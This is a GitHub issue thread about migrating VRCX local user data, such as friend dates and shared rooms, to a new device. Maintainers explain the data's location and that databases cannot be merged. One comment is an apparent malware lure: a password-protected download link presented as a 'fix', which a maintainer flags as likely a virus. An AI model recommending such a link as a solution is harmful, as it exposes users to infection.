### ISSUE TITLE
[Feature Request]I want data can be synchronized during device replacement

### ISSUE THREAD

**Issue by NekoYamaShiro** [vrcx-team/VRCX#884]
**Explain in detail what your suggested feature would be used for.**
Can you copy the file to the new device when replacing the device to improve the local database of the new device
**Describe how it would look if it requires a UI.**

**Explain why people would want to use it.**
My old friend data disappeared after I changed to a new device, and I cannot query and synchronize it. I have been looking for such a file that can enable me to re-access the original friend data information when I have to change to a new device, such as when we became friends, what maps we have played together, or when the friend deleted me

Or such a function already exists, if so, please tell me which file to copy to overwrite on the new device

Thankyou so much

**Comment by NekoYamaShiro** [comment]
I use a translator. If there are any inaccuracies, please refer to Chinese

我希望能在我更换新设备的时候，添加为好友的时间和一起加入过的房间这些数据可以得到同步，我更换过三次设备，一直找不到本地数据库在哪里也不知道该复制哪个文件覆盖或者更新新设备的本地数据库，如果有可以导出本地数据库让我拷贝到新设备并进行导入的话就更好了，或者告诉我需要拷贝哪个地址的文件并且需要覆盖到新设备的哪个地方也可以

**Comment by Natsumi-sama** [comment]
`%AppData%\VRCX` contains all you local user data.

**Comment by NekoYamaShiro** [comment]
Thank you for your reply！
If I copy and overwrite this data to the new device, will I lose the local database of the new device, or how do I update the local database of the new device

**Comment by Natsumi-sama** [comment]
It is not possible to merge databases unfortunately.

**Comment by NekoYamaShiro** [comment]
Thank you for your reply
If I copy and overwrite this data to the new device, will I lose the local database of the new device, or can you tell me how to update the local database of the new device

**Comment by NekoYamaShiro** [comment]
Ah....So there's no way to copy it and overlay it on a new device? nooooooo

**Comment by Myrkie** [comment]
merging databases is not possible, using the new database will lose all logs and information from the new device.

**Comment by NekoYamaShiro** [comment]
*sad

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Natsumi-sama** [comment]
yea I don't think so

**Comment by NekoYamaShiro** [comment]
Uh... do I need to download that link above？Sorry, I don't use github very much, so I don't know much about it

**Comment by Natsumi-sama** [comment]
Don't download that link, it's most likely a virus.

**Comment by NekoYamaShiro** [comment]
Okay！I almost downloaded it，Thank you ! *heart
